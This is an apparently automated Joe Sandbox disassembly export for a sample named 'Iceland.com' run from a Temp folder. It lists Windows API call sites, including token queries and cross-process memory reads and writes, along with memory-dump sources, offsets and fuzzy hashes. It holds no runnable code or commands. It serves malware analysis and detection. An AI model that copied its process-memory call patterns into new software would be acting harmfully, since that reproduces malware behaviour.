                                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A81A60
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A6C
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A7B
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A82
                                                                                                                                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A81A99
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 842720411-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A81916
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A81922
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A81931
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A81938
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A8194E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A81976
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A81982
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A81991
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A81998
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A819AE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c5f9d4d96d1eee7204a379b09ab9112779ebbae1e0dfc8a0c28c5c9131ee65d
                                                                                                                                                                                                                                                                • Instruction ID: 91bed08f7f9b0f0117223b632ce86a1980aa0af58da78da1902f62b8330088cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c5f9d4d96d1eee7204a379b09ab9112779ebbae1e0dfc8a0c28c5c9131ee65d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFF06275100311ABD7219FA8EC99F563BADEF897A0F110624F945D7262DA70D8028B60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CCB
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CD8
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CE5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CF2
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90CFF
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00A90B24,?,00A93D41,?,00000001,00A63AF4,?), ref: 00A90D0C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                • Opcode ID: be64b84cc9f309426a76070a1a7418e88092b4ad827dce58d825e65d55f1428f
                                                                                                                                                                                                                                                                • Instruction ID: f59bc252658840c97ded3af96079ca86869c65b7984ee6e3f49b7a0046d474d7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be64b84cc9f309426a76070a1a7418e88092b4ad827dce58d825e65d55f1428f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D601AE71900B15DFCB30AFA6D980816FBF9BF603553158A3ED19752931C7B0A999DF80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00A865BF
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A865D6
                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00A865EE
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00A8660A
                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00A86624
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                • Opcode ID: 02e6a8e074f7af0707b57d626aa9432b6405ab0611933416b88818bd32a8e5cf
                                                                                                                                                                                                                                                                • Instruction ID: 1f4a9d9f48968b025bf5bc0cb841599aec4b0315d022ffc47058af589399a1c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02e6a8e074f7af0707b57d626aa9432b6405ab0611933416b88818bd32a8e5cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74018630500304ABFB24AF50DE5EF967B78FB04705F000669B586610E2FBF4AA458B50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DAD2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DAE4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DAF6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DB08
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5DB1A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 07cac9183870c3286be25f46da1753c4c383249d1175a1832124721f4b1d7fb1
                                                                                                                                                                                                                                                                • Instruction ID: 0326cd5eaa8a2aacfb48c2d18504f26b298f6e4ead2fa413781786a3865e974a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07cac9183870c3286be25f46da1753c4c383249d1175a1832124721f4b1d7fb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF03033545248AB8634EBA8FAC2D1B77EEFE157527A60C05F809DB501CB30FC848B64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5262E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52640
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52653
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52664
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A52675
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$_free
                                                                                                                                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A82B1D,?,?,00000034,00000800,?,00000034), ref: 00A8BDF4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A830AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A82B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00A8BDBF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00A8BD1C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A8BD2C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A8BD42
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A8311A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A83167
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\314782\Iceland.com,00000104), ref: 00A51AD9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A51BA4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A51BAE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                                • API String ID: 2506810119-3378881580
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A8CBB1
                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00A8CBF7
                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AF29C0,00B85ED0), ref: 00A8CC40
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: bf413a7cb8633dfbac46f4573f310b03b45468667ae396ef8c911bbcffc3741a
                                                                                                                                                                                                                                                                • Instruction ID: 17f7efd5006b88b98590811471adc583893feb8e2b0a6d784e1d1f36d14d71cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf413a7cb8633dfbac46f4573f310b03b45468667ae396ef8c911bbcffc3741a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5416E712043029FD724EF24DD85F5ABBE8AF85724F144A1DF5A997291DB30E904CF62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ABDCD0,00000000,?,?,?,?), ref: 00AB4F48
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32 ref: 00AB4F65
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB4F75
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                • Opcode ID: 749f89e6aa38fe39b2c1fdd45bef654f11db7bb5c8ec57b7dfe238f0fa8e6a04
                                                                                                                                                                                                                                                                • Instruction ID: 2b818c0cb76ccf7a809bbe9d26a345d0f423f99a0408ed4d81545b948e3dc471
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 749f89e6aa38fe39b2c1fdd45bef654f11db7bb5c8ec57b7dfe238f0fa8e6a04
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2319C71214605AFDB218F78DC45BEA7BA9EB08334F204725F979A31E2D770EC619B50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AA3AD4,?,?), ref: 00AA3DD5
                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AA3AD7
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA3AF8
                                                                                                                                                                                                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00AA3B63
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                • Opcode ID: 05516f3f079bace77c3695a5d8b04d0d75a30e517cdc278f760a4af67ce2a77c
                                                                                                                                                                                                                                                                • Instruction ID: 380ec02fe99223d04e6e3f046b4a18562ec73ba9ca45db416ab01cd1ca908b4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05516f3f079bace77c3695a5d8b04d0d75a30e517cdc278f760a4af67ce2a77c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B31707A6002019FCB10CF69C585AA977B2EF56324F248159F8168B7E2D771EE45C770
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AB49DC
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AB49F0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AB4A14
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                • Opcode ID: 7b1f47b4e4c94765a467c04644d16e3f3d6386384b2b46fafc03b7205fb845c5
                                                                                                                                                                                                                                                                • Instruction ID: 6c7d6442bb2045770f15fdf4cb8fec1872063f7f4741cf3ea59e96220dd4968f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b1f47b4e4c94765a467c04644d16e3f3d6386384b2b46fafc03b7205fb845c5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421BC32610219BBDF11CFA4CC42FEF3B69EF48768F110214FA156B0D2DAB5A891DB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AB51A3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AB51B1
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AB51B8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                • Opcode ID: 39e37c70b10e3c6b801319c20533f74864f6b665ee29bdae5d572613e9bea579
                                                                                                                                                                                                                                                                • Instruction ID: 3f6efc99a63a0a71bcc3ef5a79eb949a8827b92e74d298d407be00b376c0ff15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39e37c70b10e3c6b801319c20533f74864f6b665ee29bdae5d572613e9bea579
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A2162B5600649AFDB10DF68DC81EBB37ADEB59364B040159F9049B362CB71EC52CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AB42DC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AB42EC
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AB4312
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                                                                                                                • API String ID: 3315199576-2633736733
